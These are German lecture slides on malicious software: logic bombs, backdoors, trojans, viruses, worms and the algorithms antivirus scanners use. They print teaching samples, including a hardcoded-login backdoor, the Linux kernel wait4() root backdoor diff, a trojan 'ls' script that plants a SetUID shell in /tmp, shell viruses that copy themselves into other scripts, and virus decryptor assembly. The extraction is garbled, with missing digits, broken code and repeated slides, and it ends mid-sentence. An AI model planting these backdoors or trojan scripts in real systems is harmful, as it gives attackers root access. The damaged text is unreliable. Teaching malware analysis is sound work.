Überblick. Vorlesung Informationssicherheit. Logische Bomben. Ausschnitt aus dem McAfee-Aktivierungskalender. Hintertüren (Back Doors) Logische Bomben

Transkript

1 Überblick Bösartige Software Vorlesung Informationssicherheit Thema 5: Bösartige Software Wirtsprogramm nötig unabhängig Robert Baumgartl Hintertüren Logische Bomben Viren Würmer Trojanische Pferde verbreiten sich selbständig Abbildung: Mögliche Kategorisierung bösartiger Software / 95 lokale vs. entfernte Angriffe on-line- vs. off-line-angriffe 2 / 95 Logische Bomben Ausschnitt aus dem McAfee-Aktivierungskalender Idee: Implantierung bösartigen Codes in Applikationen (oder in das BS), Aktivierung des Codes, sobald eine bestimmte Aktivierungsbedingung erfüllt Aktivierungsbedingung Eintritt eines Datums (logische) Zeitbombe (Kalender von Aktivierungsdaten: meist simples Löschen von Daten häufig eingesetzt, um Rache für Entlassung o. ä. zu üben 2. Mai W97M/Alamat, W97M/Yous, VBS/Horty.b@MM, VBS/Horty.a@MM, WM/Alliance.A, WM/Envader.A (Intended), WM/Eraser.A:Tw, VBS/Aqui 3. Mai VBS/Aqui, VBS/Zync, WM/Eraser.A:Tw, VBS/Alphae, WM/Envader.A (Intended), Twno.A, WM/BOOM.A;B, WM/BADBOY.A;B;C, WM/FRIDAY.D, WM/FRIDAY.A, WM/Goldsecret.B:Int,WM/CVCK.B;E, W97M/Rapmak.a, W97M/Yous, W97M/Alamat, WM/SHOWOFF.G, W97M/BackHand.A, W97M/Idea.A, W97M/Digma 4. Mai X97M/Jal.a, VBS/San@M, W97M/Este, W97M/Alamat, W32/SoftSix.worm, W97M/Yous, VBS/Valentin@MM, WM/PHARDERA.C ;D (INTENDED), W97M/Class.B, W97M/Class.D, W97M/Ekiam, WM/Eraser.A:Tw, VBS/Aqui 5. Mai... 3 / 95 4 / 95 Logische Bomben Hintertüren (Back Doors) Beispiel: Donald Gene Burleson, Programmierer für Versicherung USPA & IRA, Ft. Worth, TX entlassen am (Grund: persönliche Schwierigkeiten) am um 3 Uhr werden 68. Datensätze aus der Datenbank des Unternehmens gelöscht Code wurde bei Restaurierung der gelöschten Datensätze gefunden Vor Gericht: Benson, who spent four days testifying about how he uncovered the scheme, said the destructive programs were created Sept. 2 and Sept. 3, 985, on Burleson s computer terminal by someone using Burleson s computer password. ( 5 / 95 Idee: Einbau (nichtdokumentierter) Schnittstellen in Software zwecks späteren (unautorisierten) Zugriffes auf das System. Mißbrauch von geheimen Debugging-Schnittstellen schwierig von BS-Seite aus zu erkennen häufiges Relikt aus der Produktentwicklung Behörden sind häufig der Meinung, ein Anrecht auf Hintertüren zu haben Gegenmaßnahme: Code Reviews, Open Source symmetrische vs. asymmetrische Hintertüren viele Würmer installieren Back Doors Klassiker: Back Orifice ( feste Master-BIOS-Passworte, z. B. lkwpeter bei Award BIOS 6 / 95

2 Beispiel einer Hintertür Beispiel 2 (Backdoor im Linux-Kern; nice try) Beispiel: Login-Code mit Hintertür (Tanenbaum: Modern Operating Systems, 2, S. 6) while (TRUE) { printf("login: "); get_string(name); disable_echoing(); printf("password: "); get_string(password); enable_echoing(); v = check_validity(name, password); if (v strcmp(name, "zzzzz") == ) break; } execute_shell(name); From: Larry McVoy [ blocked] Subject: Re: BK2CVS problem Date: Wed, 5 Nov 23 4:23:2-8 On Wed, Nov 5, 23 at 2:58:3PM -8, Matthew Dharm wrote: > Out of curiosity, what were the changed lines? --- GOOD :46: BAD :46:53. -,6 schedule(); goto repeat; } + if ((options == ( WCLONE WALL)) && (current->uid = )) + retval = -EINVAL; retval = -ECHILD; end_wait4: current->state = TASK_RUNNING; --- Larry McVoy lm at bitmover.com 7 / 95 8 / 95 Beispiel 2 (Backdoor im Linux-Kern; nice try) Trojanische Pferde ( Trojaner ) jemand modifizierte die Kernelquellen (unautorisiert) fraglicher Code gehört zu sys_wait4(), d. h. dem Systemruf wait4() verkleideter Code ; (current->uid = ) sieht so ähnlich aus wie (current->uid == ) wenn jemand wait4() aufruft und die Optionen WCLONE und WALL sind gesetzt, so erhält der Rufende root-rechte Code wurde beim Review entdeckt ( It s not a big deal, we catch stuff like this, but it s annoying to the CVS users. ) Idee: dem Nutzer ein Programm unterschieben, welches bei Aktivierung unerlaubte Aktionen ausführt anstelle eines Eindringlings führt ein autorisierter Nutzer Schadcode aus Beispiel: gefälschter Login-Bildschirm Klassiker: Compiler, der unbemerkt bösartigen Code in übersetzte Programme einbaut (Ken Thompson: Reflections on Trusting Trust, CACM 4(27), S. 76ff.) vgl. Bundestrojaner 9 / 95 / 95 Beispiel eines simplen UNIX-Trojaners Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen / 95 2 / 95 2

3 Beispiel eines simplen UNIX-Trojaners Beispiel eines simplen UNIX-Trojaners (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen 3 / 95 4 / 95 Beispiel eines simplen UNIX-Trojaners (Computer)-Viren (ls benennen und im Pfad eines Nutzers unterbringen) #!/bin/sh cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm./ls ls $* kopiert und versteckt Shell setzt das SetUID-Bit und macht die Shell für alle ausführbar läuft mit den Rechten des Eigentümers, anstatt mit denen des Aufrufenden Zugriff auf Daten des Angegriffenen A virus is a program that is able to infect other programs by modifying them to include a possibly evolved copy of itself. (Fred Cohen) einige Varianten: Stealth-Viren polymorphe Viren Bootsektor-Viren Macro-Viren 5 / 95 6 / 95 Beispiel für viralen (virulenten?) Code Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) 7 / 95 8 / 95 3

4 Beispiel für viralen (virulenten?) Code Beispiel für viralen (virulenten?) Code for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) 9 / 95 2 / 95 Beispiel für viralen (virulenten?) Code Ein (etwas) besserer Virus for i in *.sh; do if test "./$i"!= "$"; then tail -n 5 $ cat >> $i; fi done Analyse: beschränkt auf eigenes Verzeichnis mehrfache Infektion wahrscheinlich kein Payload leicht zu analysieren ;-) for i in *.sh; do if test "./$i"!= "$"; then HOST=$(echo -n $(tail - $i)) VIR=$(echo -n $(tail - $)) if [ "$HOST"!= "$VIR" ] then tail -n $ cat >> $i; fi fi done 2 / / 95 Würmer Komponenten eines Wurms An independently replicating and autonomous infection agent, capable of seeking out new host systems and infecting them via the network. (Jose Nazario: Defence and Detection Strategies against Internet Worms, Artech House, 24) Bekannte Vertreter: W32.Blaster Melissa Mydoom Sasser Conficker. Aufklärung neuer Hosts als potentielle Angriffsziele IP-Adreßräume (partiell) durchsuchen lokale Suche in (z. B.) Konfigurationsdateien OS Fingerprinting, um BS-Typ und -Version zu ermitteln 2. Angriffscode Remote Exploit bekannter Schwachstellen Trojanisches Pferd (z.b. Mail mit attached Binary) benötigt für jede anzugreifende Plattform Exploit 3. Kommunikation z. B. mittels ICMP, UDP,..., über verdeckte Kanäle Verbergen beteiligter Prozesse und Sockets mittels Kernelmodul oder durch Störung von Überwachungssoftware 23 / / 95 4

5 Komponenten eines Wurms Weitere Begriffe 4. Kommandoschnittstelle interaktiv oder indirekt (script-gesteuert) typische Kommandos: Up-/Download von Dateien, Flut-Ping, Generierung von HTTP-Requests, Verwaltung der erfolgreich angegriffenen Hosts verteilte oder zentralisierte Datenbank Liste aller befallenen Rechner in privatem IRC-Channel Ransomware (kryptografisch sichere) Verschlüsselung des Massenspeichers Entschlüsselung nur nach Zahlung eines Lösegelds z. B. TROJ_PGPCODER.A Rootkit Software, die zur Verschleierung der Kompromittierung eines Rechners dient Spyware Keylogger Hoax (z. B. Good-Times- Virus ) 25 / / 95 GoodTimes FYI, a file, going under the name "Good Times" is being sent to some Internet users who subscribe to on-line services (Compuserve, Prodigy and America On Line). If you should receive this file, do not download it! Delete it immediately. I understand that there is a virus included in that file, which if downloaded to your personal computer, will ruin all of your files. [...] Computerviren 27 / / 95 Literatur Was ist ein Virus? Eric Filiol: Computer Viruses: From Theory to Appliactions. Springer, 25 Peter Szor: The Art of Computer Virus Research and Defense. Addison-Wesley, 25 Mark Ludwig: The Giant Black Book of Computer Viruses. American Eagle Publications, 995 John Aycock: Computer Viruses and Malware. Springer, Definition A virus is a program that reproduces its own code by attaching itself to other executable files in such a way that the virus code is executed when the infected executable file is executed. Anmerkungen: Implementationssprache irrelevant keine Schadroutine nötig Wurm ist auch ein Virus 29 / 95 3 / 95 5

6 Bestandteile eines Virus Analyse: Blackwolf-Virus in C Infektionsmechanismus: Aufsuchen von Zielen, Replikation Routine(n) zum Verbergen: vor dem Nutzer oder Anti-Viren-Software Trigger: Entscheidung, ob bzw. wann Nutzlast aktiviert wird Nutzlast: zufälliger oder beabsichtigter Schaden oder Spaß Beispiel: blackwolf.c ( sucht alle.com-dateien im aktuellen Verzeichnis und infizierte diese (auf einmal) schnelle Infektion überschreibender Virus mäßig destruktiv: Virus-Code überschreibt Anfang der Ziele verbirgt sich nicht keine Nutzlast infiziert bei jeder Aktivierung, Ziele wachsen nicht, da überschreibend 3 / / 95 Klassifizierung von Viren I nach dem potentiellen Ziel Klassifizierung von Viren II nach der Strategie des Verbergens Boot-Sektor (allgemeine) ausführbare Dateien (.BAT,.EXE,.VBS, PostScript, ELF,.sh,.py,... ) (spezielle) Dateien bestimmter Applikationen, die mit Makrosprache ausgerüstet sind, z. B. Microsoft Office Makroviren (data file infectors) keine verschlüsselnd (besser: obfuscating) Stealth: Virus versucht, sich sowie die Infektion zu verbergen Oligomorphismus: Virus kommt in (endlich) vielen Formen vor Polymorphismus: Virus kommt in (fast) unendlich vielen Formen vor Metamorphismus: Virus wechselt seine Gestalt 33 / / 95 Klassifizierung von Viren III nach der Schadfunktion (Nutzlast, Payload) Nichtdestruktive Schadfunktion von W95/Marburg. keine Schadfunktion typisch für Proof-of-Concept-Viren trotzdem nicht harmlos (Ressourcenverbrauch, Datenverlust infolge Absturzes,... ) 2. unbeabsichtigte Schadfunktion ( aus Versehen ) Beispiel: Stoned-Virus schreibt Boot-Sektor an einen (vermeintlich) sicheren Platz, Ende des Wurzelverzeichnisses Verzeichniseinträge werden überschrieben, falls sehr viele Dateien im Root-Verzeichnis 3. nichtdestruktive Schadfunktion Yankee Doodle Cascade (Herbstlaub) W95/Marburg: zeichnet 256 Icons (IDI_HAND) zufällig auf den Bildschirm ( ) 35 / / 95 6

7 Klassifizierung von Viren III nach der Schadfunktion (Nutzlast, Payload) 4. mäßig destruktive Schadfunktion ( mildly damaging ) Löschen z. B. von Anti-Viren Software aus Speicher und von Festplatte W95/HPS kehrt samstags unkomprimierte BMP-Bilder um (von rechts nach links) WM/Wazzu.A (996), bewegt -3 Wörter in einem Office-Dokument, fügt ab und zu das Wort Wazzu ein 5. stark destruktive Schadfunktion a) schnelles Überschreiben von Daten Michelangelo: überschreibt erste 7 Sektoren jeder Spur der Köpfe bis 4 des Bootmediums Überschreiben des MBR oder der FAT (Töltögetö-Virus) AntiPascal: löscht Pascal-Quellfiles (.PAS) Stark destruktive Schadfunktionen b) langsames Überschreiben von Daten (Data Diddler) Dark.Avenger.8.A: schreibt "Eddie lives... somewhere in time!" in zufälligen Sektor Ripper: tauscht 2 Datenworte in einem zufällig gewählten Sektor der Festplatte aus Gefahr, daß manipulierte Daten ins Backup wandern c) Datenverschlüsselung Disk Killer: XORt alle Sektoren des Datenträgers KOH: verschlüsselt Datenträger mittels IDEA (Idee: Datenschutz!), guter Virus!? d Störung der Hardware AntiCMOS: beschreibt CMOS-RAM (setzt CMOS-Passwort) W95/CIH: überschreibt (u. a.) Teile des BIOS im Flash-Speicher 37 / / 95 Mehrfachinfektion Überschreibender Virus Header Header Mehrfachinfektion muß vermieden werden, da diese zu unbeabsichtigtem Fehlverhalten und auffälligem Wachstum infizierter Dateien führen, was die Detektierung erleichtert. Virus muß infizierte von nichtinfizierten Dateien unterscheiden können Wenn ein Virus dies kann, so kann dies (potentiell) auch Anti-Viren-Software! Code Virus Infektion Header Code und Daten Code überschriebener Teil der Zieldatei nichtüberschrieben ausführbare Zieldatei Abbildung: Prinzip des überschreibenden Virus 39 / 95 4 / 95 Überschreibender Virus Anhangvirus (Appender/Prepender) Virus Größe des Ziels ändert sich nicht auch ohne Payload bösartig: Überschreiben führt zu Nichtausführbarkeit des Ziels auch Überschreiben am Ende möglich (Sprung zum Virus und danach zum Wirtsprogramm) Virus muß sehr klein sein Zieldatei Infektion 2.. infizierte Zieldatei Aufrufreihenfolge Abbildung: Prinzip des sich anhängenden Virus 4 / / 95 7

8 Anhangvirus Companion Virus (Begleiter) Append: kleiner Teil des Targets wird mit Sprung zum Virus überschrieben während Ausführung des Virus muss Zieldatei wieder restauriert werden Auch Voranstellen des Virus möglich, aber ungleich schwieriger Größe der Zieldatei ändert sich Idee: Anlegen einer zusätzlichen Datei ( Begleiter ), die mit Zieldatei (logisch) verbunden ist wenn Zieldatei ausgeführt wird, wird zunächst stets der Begleiter, der Virus, ausgeführt Integrität des Zieles bleibt erhalten, jedoch entstehen neue Dateien 43 / / 95 Companion Virus Exec. 2. Virus Virus Infektion Zieldatei Zieldatei infizierte Zieldatei Abbildung: Prinzip des Companion Virus Companion Virus Implementierungstechniken Nutzung einer Ausführungspräzedenz (z. B. MS-DOS: file.com > file.exe > file.bat) Nutzung der Hierarchie beim Suchen ausführbarer Dateien Datei gleichen Namens wie das Ziel in ein Verzeichnis schreiben, das im PATH vor dem Verzeichnis des Zieles steht Manipulation der Indexstruktur der Zieldatei Überschreiben der Startclusternummer des Zieles mit Startclusternummer des Virus (und entsprechende Verkettung) Umbenennung des Zieles Virus kopiert sich, benennt sich wie Ziel, und ruft dieses nach eigener Aktivität betriebssystemunabhängig 45 / / 95 Quellcode-Virus Autoreplizierende Programme Idee: Manipulation von Quellcode: Einfügen virulenten Codes Vorteil: infizierte Binärdateien sind vollständig intakt vgl. Ken Thompson: Reflections on Trusting Trust. CACM 4(27) 984, S. 76ff. Gegenmaßnahmen: Code Review Integritätsprüfungen von Quelldateien Definition (Quine) Ein Quine ist ein Programm, das seinen eigenen Quellcode ausgibt. ziemlich schwierig für compilierte Sprachen zu schreiben (probieren Sie es!) nicht so schwierig für interpretierte Sprachen Beispiel in C: char f ="char f=%c%s%c ; main ( ) { printf ( f,34, f,34,) \ ;}% c " ; main ( ) { p r i n t f ( f,34, f,34,) ; } Literatur: david/computers/quine.html 47 / / 95 8

9 Ein Quine in L A T E X Quines in UNIX-Shell \documentclass{book}\pagestyle {empty}\def\a{\ensuremath{\backslash}}\def\f {\def\b{\a}\def\c{\{}\def\d{\}}\def \e{\\}\noindent\g\b def\b g\c\def\b{\a b }\def\c{\a c }\def\d{\a d}\def\e{\a e \\}\g\}\a begin\{document\}\a f\a end \{document\}}\def\g{ \b documentclass\c book\d\b pagestyle\e \c empty\d\b def\b a\c \b ensuremath\c \b backslash\d\d\b def\b f\e \c \b def\b b\c \b a\d\b def\b c\c \b \c \d\b def\b d\c \b \d\d\b def\e \b e\c \b \b \d\b noindent\b g\b b def\b b g\b c\b def\b b\c \b a b\e \d\b def\b c\c \b a c \d\b def\b d\c \b a d\d\b def\b e\c \b a e\e \b \b \d\b g\b \d\b a begin\b \c document\b \d\b a f\b a end\e \b \c document\b \d\d}\begin{document}\f\end{document} Beispiel : #!/bin/bash read foo<< EOF ;eval $foo echo #!/bin/bash ;echo read foo<< " EOF " ;eval $foo \ ;echo $foo;echo EOF EOF Beispiel 2: #!/bin/bash cat $ 49 / 95 5 / 95 Funktionsweise eines Quellcode-Virus Quellcode-Virus manipuliert. Virus kreiert Quellcodefile (virus.h), 2 Komponenten: Code des Virus (, der in Zieldatei eingebunden und übersetzt wird zu infiziertem Binärfile) gleicher Code in Form einer Datenstruktur (z. B. Array) für weitere Generationen des Virus = Quine 2. Infektion eines Zieles: #include "virus.h" Einfügen mindestens eines Aufrufs des Viruscode in Ziel 3. Virus selbst kann Übersetzungslauf der infizierten Quelle veranlassen Virus aktiver Virus (Binärcode) Zieldatei (Quellcode) Übersetzung infizierte Zieldatei (Binärcode) manipuliert manipuliert Zieldatei Zieldatei Abbildung: Prinzip eines Quellcode-Virus 5 / / 95 Boot-Viren Residente Viren 3 Typen BIOS-Virus manipuliert BIOS im Flash-Speicher kann nicht durch Antivirus-Software detektiert werden unterliegt keinen Zugriffsrestriktionen bei Festplatte Beispiel: W95/CIH Boot-Sektor- bzw. MBR-Virus infiziert genau einen Sektor maximale Größe 52 Byte nachladender Boot-Sektor-Virus verbleiben nach Aktivierung im Speicher Infektionsgeschwindigkeit muss künstlich gedrosselt werden MS-DOS: Terminate and Stay Resident (TSR) Windows: VXD (virtueller Gerätetreiber) UNIX: relativ schwierig als Daemon (root-privileg erforderlich) als Hintergrundprozess, gestartet durch.profile Ymum2 53 / / 95 9

10 Verschlüsselung Ein einfacher Decryptor für.exe-dateien Ziel: Erschweren von Reverse Engineering Detektierung Identifikation des genauen Virustyps Entschlüsselung muss schnell gehen! darf keine Nutzereingaben o. ä. erwarten XOR-Verschlüsselung gern genutzt: benötigt eine Maschineninstruktion Schlüssel für Ver- und Entschlüsselung gleich DECRYPT: mov si, OFFSET START mov di, OFFSET START mov cx, VIR_SIZE ELP: lodsb xor al,93h stosb loop ELP START: Virus Body Starts here... lodsb load byte at DS:SI into AL stosb store AL into DS:DI loop <label> dec CX, jump <label>, if CX 55 / / 95 Der Decryptor des Herbstlaub-Virus Variationen des Themas lea si,start mov sp,682 DECRYPT: xor [si],si xor [si],sp inc si dec sp jnz DECRYPT START:... erster bekannter verschlüsselnder Virus START ist Beginn des verschlüsselten Teils, dynamisch gesetzt SP als Zähler missbraucht einfachste Form: lineare Verschlüsselung (Byte nach Byte), vorwärts Verschlüsselung rückwärts (Decryptor steht am Ende des Virus) mehrere verschachtelte Entschlüsselungsschleifen semizufällige Auswahl des zu entschlüsselnden Bytes 57 / / 95 Formen von Entschlüsselungsschleifen Anmerkungen Decryption Loop Decryption Loop Virus Body Virus Body Decryption Loop n Virus Body Bitmuster der Entschlüsselungsschleife reicht manchmal zur Detektierung eines Virus, da diese Funktionen eigentlich nur in Viren vorkommen präzise Identifikation oft unmöglich, da weniger Typen von Entschlüsselungsschleifen als Virentypen Verschlüsselung Basis für Vielgestaltigkeit Decryption Loop Decryption Loop 2 59 / 95 6 / 95

11 Beispiel für oligomorphen Decryptor Erkennen Sie, was dieser Code tut? DECRYPT: xor [esi],al inc esi inc al dec ecx jnz DECRYPT jmp START START:... Beispiel aus W95/Memorial sliding decryption key 2 (leicht) verschiedene Schleifen DECRYPT: xor [esi],al inc esi inc al loop DECRYPT jmp START START:... inc si mov ax,e9b clc mov di,2a mov cx,57 LABEL: xor [di],cx sub bx,dx xor bx,cx sub bx,ax sub bx,cx xor dx,cx xor [di],ax inc di clc inc ax loop LABEL START: 6 / / 95 Es ist ein Dekryptor. Beispiel für polymorphen Virus: 26 inc si mov ax,e9b clc mov di,2a mov cx,57 LABEL: xor [di],cx sub bx,dx xor bx,cx sub bx,ax sub bx,cx xor dx,cx xor [di],ax inc di clc inc ax loop LABEL START: Einfügen sogenannter junk instructions verkompliziert Code Instruktionen in Prolog und Schleife können jeweils miteinander permutiert werden 2 Register mit Schlüsseln, ax und cx jedes Wort wird doppelt verschlüsselt beide Schlüssel ändern sich stetig (cx implizit durch loop) di zeigt auf zu verschlüsselndes Wort einer der ersten echt polymorphen Viren Polymorphe Viren können eine unübersehbare Vielzahl von Dekryptor-Routinen besitzen. 63 / / 95 Weitere Aspekte polymorpher Viren langsame Polymorphie: Gestalt des Virus ändert sich in großen Zeiträumen schlecht zu testen für AV-Software Mutation Engines: übernehmen einen unverschlüsselten Virus und generieren einen polymorphen Decryptor dafür (Beispiel: The Dark Avenger Mutation Engine) Metamorphe Viren: anstatt des Dekryptors wird der Körper des Virus modifiziert (keine Verschlüsselung mehr nötig) Weitere Techniken Code Interlacing (Hole Cavity Infection); im Portable Executable (PE) - Binärformat Armoured Virus: be- oder verhindert die Analyse des Binärcodes erkennen, wenn im Debugmodus abgearbeitet (beendet sich selbst, blockiert Tastatur, rebootet) Fake Code kryptographische Techniken Retrovirus: Nutzen spezifische Erkennungsschwächen von Anti-Virus-Software Multiformatvirus kann verschiedene Dateitypen infizieren (z. B. iwinux/lindose, infiziert PE und ELF) Slow vs. Rapid Virus Manipulation des Environments kooperierende oder kombinierte Viren 65 / / 95

12 Anti-Virus-Software Scanner Zielstellung: Erkennung keine False Positives keine False Negatives Identifikation, Entfernung von Viren Scanner: Programm zur Identifikation und Eliminierung bzw. Reparatur infizierter Dateien on-demand durch den Nutzer gerufen bzw. zu ausgezeichneten Zeitpunkten (Systemstart) on-access resident bei jedem Zugriff, Öffnen, Schließen z. B. als Filter-Dateisystem-Treiber unter Windows Problem: Netzwerk-Freigaben 67 / / 95 Signatur eines Virus Definition (Signatur eines Virus) Die Signatur eines Virus ist eine endliche Sequenz von Bytes, die einen bestimmten Virus eineindeutig identifiziert Beispiel: 4 B8 2E 7BB 2 33C9 8BD 49C identifiziert den Stoned-Virus Länge der Signatur? Wildcards? durchsucht werden alle anfälligen Dateien/Festplattenbereiche Problem: Performance! Algorithmus von Aho-Corasick (975) Zur bibliografischen Suche other hi hip hips h i 3 p 5 s 8 c t hit hi chip,hip 2 h 4 i 7 p 9 Abbildung: Beispiel eines Zustandsautomaten Fehlerzustand Folgezustand 3 5 Tabelle: Zugehörige Fehlerfunktion 6 69 / 95 7 / 95 Algorithmus von Aho-Corasick (975) Input Vorher Nachher Ausgabe s c 2 h 2 4 i 4 7 hi p 7 9 chip, hip h 9 i 3 hi Tabelle: Beispiel parallele Suche nach allen eingebauten Mustern findet auch überlappende Muster Anwendung z. B. in fgrep und snort Literatur: Alfred V. Aho, Margaret J. Corasick: Efficient string matching: An aid to bibliographic search. Communications of the ACM 8(6): / 95 Algorithmus von Veldman Idee: Repräsentation der Signaturen durch kurze (z. B. 4 Byte) charakteristische Sequenzen, Filterung mittels zweier Hashtabellen wenn erste beide Bytes in Hashtabelle zu finden sind, wird in 2 Hashtabelle nach Bytes 3 und 4 gesucht Treffer verlinkt verkettete Liste mit Signaturen, die dann sequentiell durchsucht werden 2-Byte-Sequenzen für kurze Signaturen ebenfalls möglich ideal für Suche mittels Wildcards Beispielzeichenkette für Automat: blar fo gree blar?g foo greep greed agreed 72 / 95 2

13 Algorithmus von Veldman Algorithmus von Veldman Suchfunktion: foreach byte sequence bb2b3b4 in input: if HT[bb2] == then if two-byte-pattern then signatures = HT[bb2]->ST match(signatures) else if HT2[b3b4] == then signatures = HT2[b3b4]->ST match(signatures) Hash Table HT aa ab ac bl fo gr Hash Table 2 HT2 aa ab ac ar ee Signature Table ST bla?r greep foo green Abbildung: Beteiligte Datenstrukturen (Beispiel) agreed 73 / / 95 Algorithmus von Veldman Algorithmus von Wu und Manber Anmerkungen: inexakte Filterung: im Beispiel würden z. B. bleed oder grar als gültige Signatur erkannt werden folgendes Matching schliesst diese aber wieder aus match-operation der Signaturen erfolgt sequentiell Idee: Verbesserung von Veldman, irrelevante Bytes in der Eingabe überspringen erlaubt ebenfalls Wildcards Anwendung: agrep (unscharfe Suche) Literatur: Udi Manber, Sun Wu: Fast text search allowing errors. Communications of the ACM, 35(), October / / 95 Algorithmus von Wu und Manber Suchfunktion i = MINLEN while i < n: shift = SHIFT [b[i-],b[i]] if shift = : signatures = HASH[b[i-],b[i]] match(signatures) shift = i = i + shift MINLEN minimale Länge der Mustersubstrings (foo, greed,... ) b[i] Bytes der zu durchsuchenden Zeichenkette ( i < n) SHIFT Anzahl Bytes, die übersprungen werden können HASH Hashtabelle für Signaturen Algorithmus von Wu und Manber Shift Table SHIFT ab ag bl fo gr la oo re xx 2 2 Hash Table 2 HASH gr la oo re agreed bla?r foo greep Abbildung: Beteiligte Datenstrukturen (Beispiel) green 77 / / 95 3

14 Algorithmus von Wu und Manber Beispieleingabe Algorithmus von Wu und Manber Konstruktion der Datenstrukturen MINLEN=3 Leserichtung b[] b[] b[2] b[3] b[4] b[5] b[6] b[7] c a b x x f o o. Ermittlung von MINLEN 2. Initialisierung von SHIFT mit MINLEN- 3. Füllen von SHIFT SHIFT[xy] = MINLEN - q xy q xy : maximale rechte Endposition von xy in allen betreffenden Pattern, gezählt ab initiale Shift: +2 Shift: +2 Position Aufgabe: Was passiert mit der Eingabe cabxloo? Shift: + Match Beispiel: xy Signatur q xy bl bla 2 la bla 3 gr agr,gre 3 4. Konstruktion der Hashes, wenn SHIFT[xy] == 79 / 95 8 / 95 Probleme von Signaturen Scanning: Leistungssteigerung zu kurz: zu viele false positives Fehlidentifikation von Virentypen zu lang: aufgeblähte Datenbank langsame Suche Virusvarianten nicht als solche erkannt generell: ständiges Update der Signaturdatenbank nötig zeitliche Lücke zwischen Auftreten eines neuen Virus Erkennung des Virus Analyse des Virus und Generierung einer Signatur Reduktion der zu durchmusternden Daten: nicht komplette Dateien durchsuchen (Top- and Tail-Scanning) Start des Scans am Einsprungpunkt der Applikation Fixed Point Scanning: wenn exakte Position der Signatur (innerhalb des Virus) bekannt ist nur soviel durchmustern, wie der gesucht Virus lang ist Reduktion der Scan-Durchläufe: nur befallbare Dateien durchmustern (ausführbare, Dokumente) Ergebnisse früherer Scans speichern, nur erneut scannen, wenn Datei modifiziert wurde (Erkennung der Modifikation? Checksummen? Integritätssicherung der Datenbank) 8 / / 95 Exakte Identifikation Beispiel: Stoned-Virus Idee: Alle konstanten Teile eines Virus ermitteln (Map). Checksumme (z. B. CRC) über Map Voraussetzungen: Virus vollständig analysiert und verstanden Variablen identifiziert, Länge des Virus ermittelt. Variablen: seg :7c bodyzero : seg :7 c jmp f a r p t r 7ch :5 seg :7 c5 jmp s t a r t seg :7 c5 ; seg :7 c8 f l a g db ; ; hard d isk or d i s k e t t e? seg :7 c9 i n t 3 o f f dw 25h ; DATA XREF seg :7 cb int3seg dw c8h ; DATA XREF seg :7 cd j u m p s t a r t dw e4h ; o f f s e t to make seg :7 cd ; i n t e r segment jump seg :7 cf virusseg dw 9f8h ; DATA XREF seg :7 c b o o t o f f dw 7ch ; to boot seg :7 c3 botseg dw ; segment seg :7 c5 ; seg :7 c5 push ds seg :7 c6 push ax Anfang des Stoned-Virus, nach [Szor5] 83 / / 95 4

15 Beispiel: Stoned-Virus Identifikation von Varianten 2. Länge des Virus: seg :7 cd3 mov cs, B8h ; 44 bytes seg :7 cd6 push cs seg :7 cd7 pop ds seg :7cd8 xor si, si ; copy code to memory seg :7cda mov di, si seg :7 cdc c l d seg :7 cdd rep movsb seg :7 cdf jmp dword p t r cs : dh Kopierroutine, nach [Szor5] Map des Virus: x x7, xd xe, x-x87 Virus Name: Stoned.A Virus Map: x-x7 xd-xe x-xb7 Checksum: x3523d929 :8 333DBFECCD3EB C57596F Your P : E6F F6E65642 C is now Stoned! :A 7DAA4C C D4...LEGALISE MA :B 52494A5544E42 RIJUANA!... Ausschnitt aus Stoned.A Virus Name: Stoned.B Virus Map: x-x7 xd-xe x-xb7 Checksum: x3523c769 :8 333DBFECCD3EB C57596F Your P : E6F F6E65642 C is now stoned! :A 7DAA4C C495A454D4...LEGALIZE.MA :B 52494A5544E42 RIJUANA!... Ausschnitt aus Stoned.B 85 / / 95 Probleme mit polymorphen Viren Nutzung von statischen Heuristiken MOV AX, 65A XCHG DX, AX MOV AX, DX MOV BP, AX ADD EBP, 69BDAA5F MOV BX, BP XCHG BL, DH MOV BL, BYTE PTR DS:[43A5] XCHG BL, DH CMP BYTE PTR GS:[B975], DH SUB DH, BYTE PTR DS:[63] MOV AH, DH INT 2 Problem: welchen Wert haben AH und BX bei Aufruf des Interrupts? nur durch Emulator zu ermitteln. Grundidee: Identifikation von Merkmalen, die Viren von anderer Software unterscheiden, Suche nach diesen Merkmalen in Dateien, Addition und Wichtung gefundener Merkmale, Entscheidung, ob Virus oder nicht. Vorteil: neue, unbekannte 